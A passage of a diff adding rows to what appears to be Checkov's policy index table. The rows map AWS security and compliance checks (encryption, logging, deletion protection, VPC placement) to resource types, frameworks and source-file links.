+| 484 | CKV_AWS_135 | resource | [].block[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 485 | CKV_AWS_135 | resource | [].tasks[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 486 | CKV_AWS_135 | resource | [].tasks[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 487 | CKV_AWS_135 | resource | [].tasks[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 488 | CKV_AWS_135 | resource | [].tasks[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 489 | CKV_AWS_135 | resource | [].tasks[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 490 | CKV_AWS_135 | resource | [].tasks[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 491 | CKV_AWS_135 | resource | [].tasks[].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 492 | CKV_AWS_135 | resource | [].tasks[].block[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) |
+| 493 | CKV_AWS_135 | resource | aws_instance | Ensure that EC2 is EBS optimized | Terraform | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py) |
+| 494 | CKV_AWS_136 | resource | AWS::ECR::Repository | Ensure that ECR repositories are encrypted using KMS | Cloudformation | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRRepositoryEncrypted.py) |
+| 495 | CKV_AWS_136 | resource | aws_ecr_repository | Ensure that ECR repositories are encrypted using KMS | Terraform | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py) |
+| 496 | CKV_AWS_137 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) |
+| 497 | CKV_AWS_137 | resource | aws_opensearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) |
+| 498 | CKV_AWS_138 | resource | aws_elb | Ensure that ELB is cross-zone-load-balancing enabled | Terraform | [ELBCrossZoneEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py) |
+| 499 | CKV_AWS_139 | resource | aws_rds_cluster | Ensure that RDS clusters have deletion protection enabled | Terraform | [RDSDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py) |
+| 500 | CKV_AWS_140 | resource | aws_rds_global_cluster | Ensure that RDS global clusters are encrypted | Terraform | [RDSClusterEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py) |
+| 501 | CKV_AWS_141 | resource | aws_redshift_cluster | Ensured that Redshift cluster allowing version upgrade by default | Terraform | [RedshiftClusterAllowVersionUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py) |
+| 502 | CKV_AWS_142 | resource | aws_redshift_cluster | Ensure that Redshift cluster is encrypted by KMS | Terraform | [RedshiftClusterKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py) |
+| 503 | CKV_AWS_143 | resource | aws_s3_bucket | Ensure that S3 bucket has lock configuration enabled by default | Terraform | [S3BucketObjectLock.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py) |
+| 504 | CKV_AWS_144 | resource | aws_s3_bucket | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) |
+| 505 | CKV_AWS_144 | resource | aws_s3_bucket_replication_configuration | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) |
+| 506 | CKV_AWS_145 | resource | aws_s3_bucket | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) |
+| 507 | CKV_AWS_145 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) |
+| 508 | CKV_AWS_146 | resource | aws_db_cluster_snapshot | Ensure that RDS database cluster snapshot is encrypted | Terraform | [RDSClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py) |
+| 509 | CKV_AWS_147 | resource | aws_codebuild_project | Ensure that CodeBuild projects are encrypted using CMK | Terraform | [CodebuildUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildUsesCMK.py) |
+| 510 | CKV_AWS_148 | resource | aws_default_vpc | Ensure no default VPC is planned to be provisioned | Terraform | [VPCDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py) |
+| 511 | CKV_AWS_149 | resource | AWS::SecretsManager::Secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Cloudformation | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecretManagerSecretEncrypted.py) |
+| 512 | CKV_AWS_149 | resource | aws_secretsmanager_secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Terraform | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py) |
+| 513 | CKV_AWS_150 | resource | aws_alb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) |
+| 514 | CKV_AWS_150 | resource | aws_lb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) |
+| 515 | CKV_AWS_152 | resource | aws_alb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) |
+| 516 | CKV_AWS_152 | resource | aws_lb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) |
+| 517 | CKV_AWS_153 | resource | aws_autoscaling_group | Autoscaling groups should supply tags to launch configurations | Terraform | [AutoScalingTagging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingTagging.py) |
+| 518 | CKV_AWS_154 | resource | AWS::Redshift::Cluster | Ensure Redshift is not deployed outside of a VPC | Cloudformation | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftInEc2ClassicMode.py) |
+| 519 | CKV_AWS_154 | resource | aws_redshift_cluster | Ensure Redshift is not deployed outside of a VPC | Terraform | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py) |
+| 520 | CKV_AWS_155 | resource | AWS::WorkSpaces::Workspace | Ensure that Workspace user volumes are encrypted | Cloudformation | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) |
+| 521 | CKV_AWS_155 | resource | aws_workspaces_workspace | Ensure that Workspace user volumes are encrypted | Terraform | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) |
+| 522 | CKV_AWS_156 | resource | AWS::WorkSpaces::Workspace | Ensure that Workspace root volumes are encrypted | Cloudformation | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) |
+| 523 | CKV_AWS_156 | resource | aws_workspaces_workspace | Ensure that Workspace root volumes are encrypted | Terraform | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) |
+| 524 | CKV_AWS_157 | resource | AWS::RDS::DBInstance | Ensure that RDS instances have Multi-AZ enabled | Cloudformation | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSMultiAZEnabled.py) |
+| 525 | CKV_AWS_157 | resource | aws_db_instance | Ensure that RDS instances have Multi-AZ enabled | Terraform | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py) |
+| 526 | CKV_AWS_158 | resource | AWS::Logs::LogGroup | Ensure that CloudWatch Log Group is encrypted by KMS | Cloudformation | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupKMSKey.py) |
+| 527 | CKV_AWS_158 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group is encrypted by KMS | Terraform | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py) |
+| 528 | CKV_AWS_159 | resource | aws_athena_workgroup | Ensure that Athena Workgroup is encrypted | Terraform | [AthenaWorkgroupEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py) |
+| 529 | CKV_AWS_160 | resource | AWS::Timestream::Database | Ensure that Timestream database is encrypted with KMS CMK | Cloudformation | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py) |
+| 530 | CKV_AWS_160 | resource | aws_timestreamwrite_database | Ensure that Timestream database is encrypted with KMS CMK | Terraform | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TimestreamDatabaseKMSKey.py) |
+| 531 | CKV_AWS_161 | resource | AWS::RDS::DBInstance | Ensure RDS database has IAM authentication enabled | Cloudformation | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py) |
+| 532 | CKV_AWS_161 | resource | aws_db_instance | Ensure RDS database has IAM authentication enabled | Terraform | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSIAMAuthentication.py) |
+| 533 | CKV_AWS_162 | resource | AWS::RDS::DBCluster | Ensure RDS cluster has IAM authentication enabled | Cloudformation | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py) |
+| 534 | CKV_AWS_162 | resource | aws_rds_cluster | Ensure RDS cluster has IAM authentication enabled | Terraform | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterIAMAuthentication.py) |
+| 535 | CKV_AWS_163 | resource | AWS::ECR::Repository | Ensure ECR image scanning on push is enabled | Cloudformation | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py) |
+| 536 | CKV_AWS_163 | resource | aws_ecr_repository | Ensure ECR image scanning on push is enabled | Terraform | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImageScanning.py) |
+| 537 | CKV_AWS_164 | resource | AWS::Transfer::Server | Ensure Transfer Server is not exposed publicly. | Cloudformation | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TransferServerIsPublic.py) |
+| 538 | CKV_AWS_164 | resource | aws_transfer_server | Ensure Transfer Server is not exposed publicly. | Terraform | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py) |
+| 539 | CKV_AWS_165 | resource | AWS::DynamoDB::GlobalTable | Ensure DynamoDB global table point in time recovery (backup) is enabled | Cloudformation | [DynamodbGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbGlobalTableRecovery.py) |
+| 540 | CKV_AWS_165 | resource | aws_dynamodb_global_table | Ensure DynamoDB point in time recovery (backup) is enabled for global tables | Terraform | [DynamoDBGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py) |
+| 541 | CKV_AWS_166 | resource | AWS::Backup::BackupVault | Ensure Backup Vault is encrypted at rest using KMS CMK | Cloudformation | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py) |
+| 542 | CKV_AWS_166 | resource | aws_backup_vault | Ensure Backup Vault is encrypted at rest using KMS CMK | Terraform | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BackupVaultEncrypted.py) |
+| 543 | CKV_AWS_167 | resource | aws_glacier_vault | Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it | Terraform | [GlacierVaultAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py) |
+| 544 | CKV_AWS_168 | resource | aws_sqs_queue | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) |
+| 545 | CKV_AWS_168 | resource | aws_sqs_queue_policy | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) |
+| 546 | CKV_AWS_169 | resource | aws_sns_topic_policy | Ensure SNS topic policy is not public by only allowing specific services or principals to access it | Terraform | [SNSTopicPolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py) |
+| 547 | CKV_AWS_170 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Cloudformation | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerPermissionsMode.py) |
+| 548 | CKV_AWS_170 | resource | aws_qldb_ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Terraform | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py) |
+| 549 | CKV_AWS_171 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encryption is using SSE-KMS | Terraform | [EMRClusterIsEncryptedKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py) |
+| 550 | CKV_AWS_172 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger has deletion protection enabled | Cloudformation | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerDeletionProtection.py) |
+| 551 | CKV_AWS_172 | resource | aws_qldb_ledger | Ensure QLDB ledger has deletion protection enabled | Terraform | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py) |
+| 552 | CKV_AWS_173 | resource | AWS::Lambda::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) |
+| 553 | CKV_AWS_173 | resource | AWS::Serverless::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) |
+| 554 | CKV_AWS_173 | resource | aws_lambda_function | Check encryption settings for Lambda environmental variable | Terraform | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) |
+| 555 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py) |
+| 556 | CKV_AWS_174 | resource | aws_cloudfront_distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Terraform | [CloudfrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontTLS12.py) |
+| 557 | CKV_AWS_175 | resource | aws_waf_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) |
+| 558 | CKV_AWS_175 | resource | aws_wafregional_web_acl | Ensure WAF has associated rules | Terraform |
[WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 559 | CKV_AWS_175 | resource | aws_wafv2_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 560 | CKV_AWS_176 | resource | aws_waf_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | +| 561 | CKV_AWS_176 | resource | aws_wafregional_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | +| 562 | CKV_AWS_177 | resource | aws_kinesis_video_stream | Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisVideoEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py) | +| 563 | CKV_AWS_178 | resource | aws_fsx_ontap_file_system | Ensure fx ontap file system is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOntapFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py) | +| 564 | CKV_AWS_179 | resource | aws_fsx_windows_file_system | Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXWindowsFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py) | +| 565 | CKV_AWS_180 | resource | aws_imagebuilder_component | Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK) | Terraform | 
[ImagebuilderComponentEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py) | +| 566 | CKV_AWS_181 | resource | aws_s3_object_copy | Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3ObjectCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py) | +| 567 | CKV_AWS_182 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DocDBEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py) | +| 568 | CKV_AWS_183 | resource | aws_ebs_snapshot_copy | Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSSnapshotCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py) | +| 569 | CKV_AWS_184 | resource | aws_efs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py) | +| 570 | CKV_AWS_185 | resource | aws_kinesis_stream | Ensure Kinesis Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py) | +| 571 | CKV_AWS_186 | resource | aws_s3_bucket_object | Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3BucketObjectEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py) | +| 572 
| CKV_AWS_187 | resource | AWS::SageMaker::Domain | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 573 | CKV_AWS_187 | resource | AWS::SageMaker::NotebookInstance | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 574 | CKV_AWS_187 | resource | aws_sagemaker_domain | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | +| 575 | CKV_AWS_187 | resource | aws_sagemaker_notebook_instance | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | +| 576 | CKV_AWS_189 | resource | aws_ebs_volume | Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSVolumeEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py) | +| 577 | CKV_AWS_190 | resource | aws_fsx_lustre_file_system | Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK) | Terraform | [LustreFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py) | +| 578 | 
CKV_AWS_191 | resource | aws_elasticache_replication_group | Ensure ElastiCache replication group is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ElasticacheReplicationGroupEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py) | +| 579 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | +| 580 | CKV_AWS_192 | resource | aws_wafv2_web_acl | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py) | +| 581 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | +| 582 | CKV_AWS_193 | resource | aws_appsync_graphql_api | Ensure AppSync has Logging enabled | Terraform | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncLogging.py) | +| 583 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | +| 584 | CKV_AWS_194 | resource | aws_appsync_graphql_api | Ensure AppSync has Field-Level logs enabled | Terraform | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py) | +| 585 | CKV_AWS_195 | resource | 
AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 586 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 587 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 588 | CKV_AWS_195 | resource | aws_glue_crawler | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 589 | CKV_AWS_195 | resource | aws_glue_dev_endpoint | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 590 | CKV_AWS_195 | resource | aws_glue_job | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 591 | CKV_AWS_196 | resource | aws_elasticache_security_group | Ensure no 